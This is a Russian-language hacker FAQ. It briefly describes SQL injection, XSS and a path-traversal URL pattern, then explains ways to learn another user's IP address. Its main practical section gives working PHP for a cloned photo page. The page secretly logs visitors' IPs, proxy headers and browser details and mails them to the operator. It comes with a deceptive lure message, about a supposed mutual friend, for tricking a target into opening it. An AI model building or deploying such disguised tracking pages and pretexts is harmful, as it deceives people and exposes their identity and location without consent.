Основные уязвимости, это, несомненно:

1. SQL-инъекции (SQL-injection)

SQL инъекция относится к вставке метасимволов SQL в вводимые пользователем данные, что приводит к изменению запроса базе данных. Как правило, взломщики для начала определяют уязвимость сайта к такой атаке (для этого в форму, или в один из параметров url посылается знак одинарной кавычки). Последствия выполнения такой атаки на уязвимом сайте могут находиться в пределах от появления детального сообщения об ошибке, что раскрывает злоумышленнику используемую на сайте технологию, до доступа к закрытым областям сайта или выполнения на сервере произвольных команд операционной системы.

Линки по теме:
http://securitylab.ru/contest/212083.php
http://injection.rulezz.ru/

2. межсайтовый скриптинг (XSS)

Принцип работы межсайтового скриптинга основан на внедрении злонамеренного кода в HTML код страницы, что приводит к выполнению такого кода на машине жертвы, то есть броузером. Чаще всего применяется в гостевых книгах, чатах и форумах.

Также XSS представляет опасность, если произвольный код отображается на страницах с расширением shtml, т.е. сервер поддерживает технологию SSI (Server Side Includes). Это может привести к чтению или выполнению произвольных файлов на сервере.

Линки по теме:
http://www.xakep.ru//magazine/xa/063/082/1.asp
http://security.e-gloryon.com/3027306486

3. Прочие баги в головах программистов ;)

Ошибки в самом сайте, из-за которых на сайте могут появиться серьезные бреши в безопасности. Например, адрес сайта содержит что-нибудь вроде «?file=», допустим site.ru?show.php&article=../index.asp, но, само собой, это лишь один из вариантов.

Линки по теме:
http://www.xakep.ru//magazine/xs/047/042/1.asp
http://www.xakep.ru//magazine/xa/069/084/1.asp

Как узнать ip сервера, например yandex.ru?

Самый быстрый способ – набрать в командной строке «ping yandex.ru»
Ты увидишь что-нибудь вроде
64 bytes from 213.180.204.11: icmp_seq=0 ttl=41 time=60.988 ms
213.180.204.11 – это и есть ip-адрес сервера.

Как узнать ip юзера в сети?

1. Общаться с ним по аське. Многие icq-клиенты, такие как Miranda IM, SIM и т.п., показывают ip в информации о пользователе. Если не хотите качать продвинутые клиенты, можно воспользоваться специальными программами типа uin2ip, или патчами для стандартных версий ICQ.

Кроме того, на сайте leader.ru есть UIN Locator. Вводишь UIN получаешь IP, главное чтобы чел был не в оффлайне.

2. Добиться того, чтобы пользователь прислал тебе письмо. Вне зависимости от того, пользуется ли он веб-интерфейсом, или же почтовиком вроде TheBat!, в заголовках сообщения будет указан его ip. В TheBat! Заголовки можно прочитать, нажав правую кнопку и выбрать в контекстном меню «показывать заголовки RFC-822». Ищи текст «Received: from», который находится ближе всего к телу письма – сразу за этими словами будет ip-адрес отправителя.

3. Узнать на каких irc-каналах сидит юзер и посмотреть там

4. Если ничего не помогает, но очень хочется, не отчаивайся.

Если у тебя есть хостинг, на котором можно исполнять perl/php (если нет, можно бесплатно зарегистрировать, например, на h15.ru), то вот еще один способ – выбираешь страничку, на которой есть фотография какого-нибудь случайного человека (допустим, http://masters.donntu.edu.ua/2001/ggeo/pavelchak/), полностью копируешь HTML-код в новый файл, например, info.html и сохраняешь его на своем сайте. Рядом создаешь еще один файл index.php, следующего содержания:

<?

$message = "Date: " . date("d.m.Y H:i:s")  . "\nIP: " . $REMOTE_ADDR . "\nServer: " . gethostbyaddr($REMOTE_ADDR) . "\nHTTP_X_FORWARDED_FOR: " . $HTTP_X_FORWARDED_FOR . "\nPage: " . $SERVER_NAME . $REQUEST_URI . "\nQuery: " . $QUERY_STRING . "\nComing from: " . $HTTP_REFERER . "\nBrowser: " . $HTTP_USER_AGENT . "\nFilename: " . $SCRIPT_FILENAME;

mail("admin@mail.ru", "Requested ip", $message, "From: admin@mail.ru\nContent-Type: text/plain; charset=UTF-8", "-fadmin@mail.ru");

$fp = fopen("log.txt", "a");

fwrite($fp, str_replace("\n", "\t", $message) . "\n");

fclose($fp);

include("fil.html");

?>

Само собой, мыло admin@mail.ru необходимо заменить на твой почтовый ящик. Эта страничка (index.php) визуально не будет отличаться от оригинала, но логи с ip и параметрами системы юзера отошлются тебе на почту и продублируются в лог-файл (проверь, что у этого файла есть права на запись, например 666, или 777). Кроме того, если человек находится в локальной сети, ты получишь еще и его локальный ip, а если ходит через прокси, то поимеешь ip как прокси, так и его собственный.

Теперь твоя задача – заманить юзера на эту страничку. Само собой, не стоит просто присылать ее по аське. Мой любимый способ такой: «Привет [тут имя того, чей ip хочешь узнать], ты помнишь Таню ([а вот тут как раз линк на твою страничку с фоткой])? Она сказала, ты можешь помочь мне с дизайном (взломом, разведением кактусов и т.п).

Действует 100% :)

Я знаю ip компьютера/юзера, как его взломать

IP – это уникальный адрес компьютера. Так же как для рассылки корреспонденции у каждого жителя планеты должен быть уникальный домашний адрес (Страна, город, улица, дом, квартира), каждый компьютер должен иметь свой уникальный ip-адрес, чтобы другие компьютеры в сети смогли передать ему информацию.

Поэтому твой вопрос равносилен вопросу «как взломать квартиру друга, если я знаю его домашний адрес».

Надеюсь, ты понимаешь, что просто знание ip недостаточно. Подробнее про ip-адрес, можно прочитать тут: http://www.sluh.freenet.kz/p8/12.html